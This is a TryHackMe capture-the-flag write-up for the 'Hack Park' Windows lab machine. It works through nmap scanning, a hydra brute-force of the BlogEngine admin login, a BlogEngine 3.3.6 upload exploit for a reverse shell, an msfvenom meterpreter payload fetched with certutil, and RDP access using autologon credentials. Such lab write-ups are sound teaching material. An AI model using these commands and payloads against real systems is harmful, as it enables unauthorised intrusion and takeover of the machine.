TryHackMe-Hack Park

Abdullah Rizwan | 09 : 45 PM | 30th October 2020


This is a windows machine so it might not respond to ping so in this we are going to use -Pn to ingore ping the box

nmap -Pn -sC -sV

Host is up (0.17s latency).
Not shown: 998 filtered ports
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2020-10-30T16:52:20+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


I uploaded the image to see where this image was on the internet

Then I came on to a page where it mentions the clown's name pennywise


Here we see an /admin page lets visit it

We can on the source that this is post form which the request that will be made here will be post a request.


Now that we know it's a post request login form let's try to bruteforce it with hydra but we want a username to bruteforce with so by looking at the hints provided by this room the username is admin .

Doing this will give you wrong results

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:UserName=^USER^ & Password=^PASS^&Login:Login failed"

Now we launch burpsuite intercept the login page with the credentials and we will get this request


Modify the command by replacing %21admin: with /admin: and Username=admin with ^USER^ , Password=^PASS^

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=rKI96%2BsCmsHE%2BBnXdIfX2SDkfH9eXlljTdGkdGcVZvZs4wFTrEcHN8RzIiJUP3%2BmIotfzJsQcEGZkMsFWgCKCcodwrJ0SgoYW6AHLLU3Lf9eI4t0abp6pf2yQ6TIJhJb8D143UhfjmN83j2hEeECKoz5FknRAYWStUq%2FPQA%2FIuHRtaES66kLKksczFvJuU%2B5g5E0lZFLWKoiBU8kIHH%2FBJcfOZrMU4UiWe9lOS2zOwtICdeoD3%2FmgBKIVbefaQDASAS%2BEyufY0WmK%2FGQlKkKrKgw7aY5yjnjHK0qlnhWSlYirlOzmQG1OM%2BgjNLe9lh%2B0FnTKo%2B8l2yrE%2FOtmjfzo7GUHHDyy2kG3Jzb%2Fnc63sYdmpE3&__EVENTVALIDATION=TuS%2F6KtXDbAW7T9F99qLDc%2Bdn5DVR%2FFt6iHlpBIA70gHcfSj6gOvo%2BedBax4e%2Bg9AHpwy0wZr9UAz18%2FzK7qGWGOt3Qa3y0kYnv7So%2BCr7Dx%2F2hgHXmU8QEl1nZbLT%2B9X%2FYLOQfNLu6V2SMGWewSmvdqTs%2FIbIHGLoXPTljXEiu4yPSy&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V

Now give it some time while it's ruuning

And you will have your username : admin and password : 1qaz2wsx

You can see here that it is using and it's version is 3.3.6. So first thing that I'am going to do is search for this on exploit-db

Now edit your IP and port in this code

Save it as PostView.ascx

Go to Posts on the blogenginge

Set up your netcat listener

Navigate to

Now this shell is unstable so we are going to upload a payload and capture it using metasploit


msfvenom -p windows/meterpreter/reverse_tcp LHOST=  LPORT=5555 -f exe > shell.exe


Launch metasploit through msfconsole -q

use exploit/multi/handler for listener

Set the options as same as on the payload

Now upload it to the reverse shell

python3 -m http.server 80 For uploading

certutil.exe -urlcache -f shell.exe For donwloading through reverse shell

And looks we have it on the windows box

And just like that we have a stabilized reverse shell through metasploit ,awesome !

You can run systeminfo on cmd

Host Name:                 HACKPARK                                       
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User   
Registered Organization:                                                  
Product ID:                00252-70000-00000-AA886    
Original Install Date:     8/3/2019, 10:43:23 AM            
System Boot Time:          10/30/2020, 9:44:53 AM    
System Manufacturer:       Xen                                            
System Model:              HVM domU                                       
System Type:               x64-based PC          
Processor(s):              1 Processor(s) Installed.           
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz                   
BIOS Version:              Xen, 8/24/2006
Windows Directory:         C:\Windows  

Here you can find Orginal Install Date

For some reason the abonormal service part was giving me issues so I skipped doing the whole message.exe thing instead I found something interesting with winpeas that there are autologon credentials for the administrator , We know that RDP on port 3389 is open so we can use remmina and get in to the box

Now we are administrator and can do pretty much anythin.